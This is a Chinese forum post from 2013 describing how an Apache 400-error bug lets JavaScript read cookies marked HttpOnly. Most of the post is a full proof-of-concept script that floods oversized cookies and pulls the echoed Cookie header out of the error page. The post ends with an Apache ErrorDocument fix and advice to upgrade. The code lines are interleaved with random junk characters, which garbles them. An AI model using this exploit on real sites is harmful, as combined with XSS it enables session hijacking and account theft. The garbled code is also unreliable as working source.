很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
$ Q. a* i n6 J% B# i3 N+ ?
w* K7 y# C. ?. Y5 d1 X: ]& S用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:: U4 r) T2 {9 u3 n% _8 l3 f: c
& q5 Z( M8 A/ d7 b
o3 B4 M+ {; j( }# W8 f( ~// http://www.exploit-db.com/exploits/18442/' m" p1 _/ c: z* p9 z2 G9 s
function setCookies (good) {- ]" a/ H" s D8 Y
// Construct string for cookie value
0 n3 e2 p4 R: C! M7 Y% }. Fvar str = "";
0 P7 `" L# b2 ]4 I) ufor (var i=0; i< 819; i++) {5 F* `5 _+ x. c. K
str += "x";
r, B7 ]* e7 H1 a# y1 [. `}8 ?6 x3 m. X; K8 m( N/ \. j
// Set cookies
. ?6 L; f6 E7 u8 F* z8 `& Efor (i = 0; i < 10; i++) {" O9 p; a' i- Q" y) ~
// Expire evil cookie
! F. _: H( k4 v' Yif (good) {
0 Y4 q# P" ^9 @$ Z- rvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";5 G0 _ m& k6 o* w6 r
}
2 W J$ P/ {2 d# h5 f, }9 M// Set evil cookie
; e9 U( Z9 k/ v; H9 belse {
4 h% S, @2 I" Z* F: P) evar cookie = "xss"+i+"="+str+";path=/";
8 K) n) l. i" N4 O e& G}; m( Q& g, `3 o: p1 @* ?% @# t$ S
document.cookie = cookie;% K7 T* _. E1 E9 T, Y: c
}& E2 B+ g6 }) c/ R
}, h: P- O2 O( m) K5 Z% o/ Z- t
function makeRequest() {9 m' ]. H3 [/ B
setCookies();% k# i0 O/ d: ^- T2 r
function parseCookies () {
4 G- D9 |6 R; w6 C" E/ Tvar cookie_dict = {};" m9 v- S ~2 D; j
// Only react on 400 status
5 v& V2 Z W: `: O& B1 h) T/ _if (xhr.readyState === 4 && xhr.status === 400) {3 y) h/ z$ T8 P3 d* x `
// Replace newlines and match <pre> content
7 p- h4 N* X0 z; T1 o f' G3 W; K' ivar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
6 H+ J2 f+ Q' yif (content.length) {
2 P% u* x" n i- m; R6 C4 Y4 R// Remove Cookie: prefix6 R( q+ ?* q: ?
content = content[1].replace("Cookie: ", "");! c4 w1 O& q8 p. B" ~$ k
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
& }5 M+ e# Z6 M" k! Y P// Add cookies to object
3 R; J8 Q7 u4 Rfor (var i=0; i<cookies.length; i++) {
3 v, I+ j9 W' z5 p; vvar s_c = cookies.split('=',2);- Q$ [* f. v9 m+ W2 n" d
cookie_dict[s_c[0]] = s_c[1];: R- z1 A! n5 u: R& n. L
}0 L6 E2 ?' d0 ~. ]0 a2 M, A9 |) ^
}
/ E5 D1 A0 Z/ Y7 @ [ r- |// Unset malicious cookies% B0 t' j- M/ f a) O0 W/ M
setCookies(true);. o$ f" y; e- G! H5 o4 x
alert(JSON.stringify(cookie_dict));9 J) _0 w- G$ }5 J2 f
}
# P- ^! x6 t6 H e! L}$ R' q6 m; z3 _; R! [
// Make XHR request
; n! N. v* |' w, uvar xhr = new XMLHttpRequest();
% {0 ^6 H/ @. W4 k$ I- Mxhr.onreadystatechange = parseCookies;
% w, g4 v( |6 wxhr.open("GET", "/", true);
Z7 `5 |" M. w6 j1 u- N3 kxhr.send(null);
7 Z# z |, A/ S}5 i) U4 \0 {0 M9 k1 I; \6 j
makeRequest();' ^$ N2 H9 H. [
; A: P8 |! C( f1 B3 n你就能看见华丽丽的400错误包含着cookie信息。$ O( t5 U% \/ T0 I9 J, g9 m
, U+ B9 o' U1 m% K( u! S5 ~9 t下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
7 ]6 L& e! v0 y* I0 l, O0 c7 |5 l$ e3 E" J8 v
修复方案:
o( I7 B' O+ ]1 C. i5 M p9 D5 o; T* c1 `0 i7 E5 X+ t# P6 ^) {
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
) m9 f* X, o+ o+ _; i8 f6 O% a/ `$ H
% Q! h/ m; h; _( o( a! eIn the event of a problem or error, Apachecan be configured to do one of four things,
, v O0 ~ f# e$ H+ ]. i4 t! U- c' ^
4 Y& X) Z0 q/ _2 |' d1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
- |) H6 H( s, m4 `2. output acustomized message输出一段信息
+ V' ^; p! | D- G6 X3 ~) C# v* q3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
0 m0 {( I. {) g/ L5 M5 s4. redirect to an external URL to handle theproblem/error转向一个外部URL
: |+ T& S ~2 ?
3 f% }1 b" k! a9 `经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
( \8 p( p5 `, P) L) Q7 h3 m' C/ ?6 B/ R2 ` d( ]5 q
Apache配置:# C# N9 _* R& V5 v- i# A
6 G$ C5 @# g+ f0 ~
ErrorDocument400 " security test"2 q$ P( a( g% _# ~# ^2 l' j8 d
D+ j Y0 @0 r: p* Q当然,升级apache到最新也可:)。2 q$ n! c9 ~- L7 T" E* d$ c K
+ a U7 L N. t" a/ y" I参考:http://httpd.apache.org/security/vulnerabilities_22.html
/ \* q S! z- P; Y
9 a( \ H- X/ H$ A |
发表于 2013-4-19 19:15:43
收藏
支持
反对